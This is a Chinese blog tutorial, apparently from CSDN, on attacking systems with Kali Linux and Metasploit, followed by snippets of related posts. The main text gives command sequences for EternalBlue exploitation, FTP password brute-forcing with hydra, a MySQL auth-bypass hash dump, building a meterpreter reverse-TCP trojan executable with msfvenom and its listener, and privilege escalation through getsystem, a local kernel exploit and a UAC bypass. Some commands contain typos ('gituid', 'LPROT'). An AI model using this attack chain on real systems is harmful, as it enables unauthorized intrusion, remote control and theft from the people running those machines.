linux 漏洞 msf,Kali Linux漏洞扫描、漏洞利用、MSF木马生成及权限提升篇

最新推荐文章于 2024-09-27 09:26:12 发布
最新推荐文章于 2024-09-27 09:26:12 发布
阅读量1.9k 收藏 16
点赞数 2
文章标签: linux 漏洞 msf

还是老样子,仅供有一定基础的朋友Kali Linux入门,毕竟这不是完整的详细教程,你不一定能看懂,但是原理是没任何问题的。以下都是一些简单的示例:其它的示例以此类推就可以了。

一、Kali Linux漏洞扫描

Web层面:Kali自带的owasp-zap、w3af

系统层面:Openvas、Nessus

二、Kali Linux漏洞利用

1、漏洞利用复现MS17-010测试

msf5 > use exploit/windows/smb/ms17_010_eternalblue

2、端口安全问题弱口令攻击

弱口令:FTP登陆

msf5 > use auxiliary/scanner/ftp/ftp_login

[email protected]:/# hydra -l user -P passlist.txt ftp://192.168.1.104

3、端口安全问题服务版本漏洞攻击

服务漏洞:MySQL 5.5.23

msf5 > use auxiliary/scanner/mysql/mysql_authbypass_hashdump

三、Kali Linux MSF木马反弹程序生成技术

第一步:

[email protected]:/# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.102 LPROT=888 -f exe -o fujieace.exe

第二步:

msf5 > use exploit/multi/handler

msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp

四、Kali Linux MSF权限提升

以下是以windows举例的,如果遇到Linux只需要选择相应的Linux模块即可!原理都是相同的。

第一种:自带的权限提升

meterpreter > gituid

meterpreter > getsystem

第二种:利用溢出漏洞提升

meterpreter > background

msf5 exploit(multi/handler) > use exploit/windows/local/ms11_080_afdjoinleaf

msf5 exploit(windows/local/ms11_080_afdjoinleaf) > set session 2

第三种:UAC权限提升

msf5 exploit(multi/handler) > use exploit/windows/local/bypassuac

一代目
关注
MSF扫描漏洞模块
qq_41821067的博客
02-18 5676
目录DNS记录解析查询工具nslookupMSF 扫描模块nmap自动化扫描插件漏洞库小工具 参考博客 我们可以利用网站进行whois查询 https://www.benmi.com/whoishistory/ 可以通过 https://www.reg007.com/ 查看手机号查询过什么网站 DNS记录解析查询工具nslookup 如下两种查询方式 查询类型默认是NS名字服务器记录 MSF 扫描模块nmap 可以看到通过nmap可以看到端口开放信息 -sV 是查询开放端口 -V是省略 自动化扫描
MSF | 漏洞利用
君逍遥o
10-22 928
MSF是一个综合性渗透测试工具,集成信息收集、漏洞扫描漏洞利用以及提权等功能的工具。
kali笔记】Metasploit Framework (MSF) 从基础到进阶使用指南,零基础入门到精通,收藏这一就够了
Javachichi的博客
09-27 1141
Metasploit Framework最初由HD Moore于2003年发布,并于2007年使用Ruby语言重写。MSF默认集成在Kali Linux中,同时也支持在非Kali环境下安装和使用。它提供了一套完整的渗透测试框架,包括漏洞利用模块(exploits)、攻击载荷(payloads)、辅助模块(auxiliary)、编码器(encoders)、空指令(nops)、后渗透模块(post)等多个组件。MSF的强大之处在于其可扩展性。
MSF进行基本的漏洞扫描
Ethan024的博客
06-02 1330
监听目标服务器的80端口,并发送一个GET HTTP请求: kali@kali:~$ nc 192.168.168.228 80 get http 此时目标服务器会提供该端口上运行的Web服务器系统。
msf扫描服务器漏洞,并发现漏洞对系统的入侵
b312738566的博客
10-20 1652
学会利用扫描工具来扫描服务器的漏洞,并通过发现的漏洞对系统进行入侵,上传木马并远程控制服务器,学生通过实验感性认识黑客入侵。工具软件:metasploit、windows系统、木马启动Msfconsole。
kali linux135漏洞,Kali Linux渗透基础知识整理(二):漏洞扫描
weixin_34182361的博客
05-16 1743
漏洞扫描网络流量NmapHping3NessuswhatwebDirBusterjoomscanWPScan网络流量网络流量就是网络上传输的数据量。TCP协议TCP是因特网中的传输层协议,使用三次握手协议建立连接。当主动方发出SYN连接请求后,等待对方回答SYN+ACK ,并最终对对方的 SYN 执行 ACK 确认。这种建立连接的方法可以防止产生错误的连接,TCP使用的流量控制协议是可变大小的滑动...
linux winserver漏洞,Kali Linux实战:Windows Server 2012 R2系统漏洞利用过程
weixin_39781930的博客
05-16 2080
本文将复现MS17010漏洞在windows Server 2012 R2系统下的利用过程,通过使用msf渗透框架生成的shell以及github上的exp生成的二进制文件相拼接,从而生成一个完整的二进制文件,注入到远程主机的系统进程中。测试环境kali linux 2017 x32(attacker)Windows Server 2012 R2(victim)准备工作首先下载相关的PoC下载et...
kali linux msf系列视频教程
10-25
kali linux msf系列教程 -------------------------------------------- kali msf 系列 第一章虚拟机使用 kali msf 系列 第一章虚拟机使用 kali msf 系列 第二章MSF基础使用+第一个实验 kali msf 系列 第三章浏览器...
kalilinux使用msf生成木马
最新发布
11-05
要在Kalilinux上使用MSF生成木马,首先你需要安装Metasploit,这通常通过apt-get命令完成: ```sh sudo apt update sudo apt install metasploit-framework ``` 然后,你可以使用MSF的`exploit`模块创建木马...
msf漏洞利用
qq_43200478的博客
07-24 2638
msf漏洞使用(二) 1、网络服务器攻击渗透(MS08-067) 用到的靶机:win xp 1️⃣、启动kali,输入 msfconsole 出现下列界面 2️⃣、在msf框架下搜索msf08-067漏洞 search msf08-067 [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-4Wzh3j9B-1595602652038)(#MSF.assets/1595579097351.png)] 3️⃣、选择编号为0的木马 use o [外链图片转存失败,源站可能有
msf生成linux elf木马反弹shell
shatianyzg的博客
06-13 1649
攻击机:Kali 192.168.241.128 靶机:centos 7 192.168.241.129 msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=xxx.xxx.xxx.xxx LPORT=8888 -f elf > mshell.elf各参数解释: inux/x64/meterpreter/reverse_tcp //这是反弹的payload LHOST=xxx.xxx.xxx.xxx //这里写kali的ip LPORT //写k
第三章-2 MSF扫描漏洞模块
划水的小白白
05-13 7220
本文内容: ~信息收集 ~扫描模块 ~自动化扫描插件 ~漏洞库小工具 一、信息收集 1,whois进阶收集信息 https://www.benmi.com/whoishistory/ 查询某站历史Whois信息 https://www.reg007.com/ 手机号注册过哪些网站 危害: 通过whois找到对方的管理员信息,例如名字,邮箱电话等, 进行密码组合生成新密码组合生成针对性的密码字典 密码存在
【常用工具】MSF使用教程(一)漏洞扫描与利用(以永恒之蓝漏洞复现为例)_msf漏洞扫描
2201_75735270的博客
03-29 4118
背景:永恒之蓝(Eternal Blue)爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。甚至于2017年5月12日, 不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,使全世界大范围内遭受了该勒索病毒,甚至波及到学校、大型企业、政府等机构,只能通过支付高额的赎金才能恢复出文件。不过在该病毒出来不久就被微软通过打补丁修复。
【常用工具】MSF使用教程(一)漏洞扫描与利用(以永恒之蓝漏洞复现为例)
热门推荐
Fighting_hawk的博客
03-27 2万+
1. 了解MSF框架的使用方法。 2. 了解永恒之蓝漏洞
msfconsole漏洞扫描工具详解
有勇气的牛排博客
07-24 7204
目录1 msfconsole 介绍 1 msfconsole 介绍 msfconsole 简称 msf 是一款常用的安全测试工具,包含了常见的漏洞利用模块和生成各种木马,其提供了一个一体化的集中控制台,通过msfconsole,你可以访问和使用所有的metaslopit插件,payload,利用模块,post模块等等。msfconsole还有第三方程序的接口,比如nmap、sqlmap等,可以直接在msfconsole里面使用。 kali可直接在命令使用: msfconsole Msfconsole的系统
msf弱点扫描
舞动的獾
07-15 1115
VNC远程桌面 使用密码暴力破解模块 use auxiliary/scanner/vnc/vnc_login 标准的vnc开放的是5900端口 自带密码文件,cat命令查看后只有一个password,有点儿敷衍,可以自己更换密码。 破解出来,就可以使用vncconnect命令连接。 无密码vnc 基本不存在,看运气,能找到一个,几乎可以买彩票了。 – use auxiliary/scanner/vnc/vnc_none_auth RDP扫描测试 查看是否存在远程桌面漏洞 use auxiliary/s
网络安全: Kali Linux 使用 MSF 漏洞利用
cronaldo91的博客
03-06 2307
(4)Kali Lnux (2024.1) 使用MSF运⾏脚本。(4) 查看Windows server 2008 IP 地址。(2)上传后⻔程序nc.exe 到Windows server。(3)查看Kali Linux (2024.1)系统IP地址。点击CVEs查看通用漏洞编号(cve-2015-1635)(2)查看Kali Linux (2024.1)系统版本。(1)获取windows 服务器的密⽂密码。(10)UAC (用户账户控制设置)管理。192.168.204.146(动态)
网络安全: Kali Linux 使用 MSF 渗透测试
cronaldo91的博客
03-05 2353
(6) 查看Kali Linux (2022.4)系统IP地址。(5)查看Kali Linux (2022.4)系统版本。(2)查看Kali Linux (2024.1)系统版本。(1)Kali Linux (2024.1)系统版本。(2)Kali Linux (2022.4)系统版本。(1)Kali Linux (2024.1)系统版本。(2)Kali Linux (2022.4)系统版本。(1)Kali Linux (2024.1)系统版本。(2)Kali Linux (2022.4)系统版本。
Linux系统漏洞复现分析,linux 内核溢出漏洞利用分析
weixin_39732491的博客
04-29 284
0x01 环境搭建文件: centos6.9 x64位, linux-kernel-2.6.32.29 内核源码工具: qemu平台: archlinux打开终端,创建一个使用10G 的qcow2 文件Qemu-img create –f qcow2 centos.qcow2 10G开始安装centosQemu-system-x86_64 –hda centos.qco2 –m 1024M –bo...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值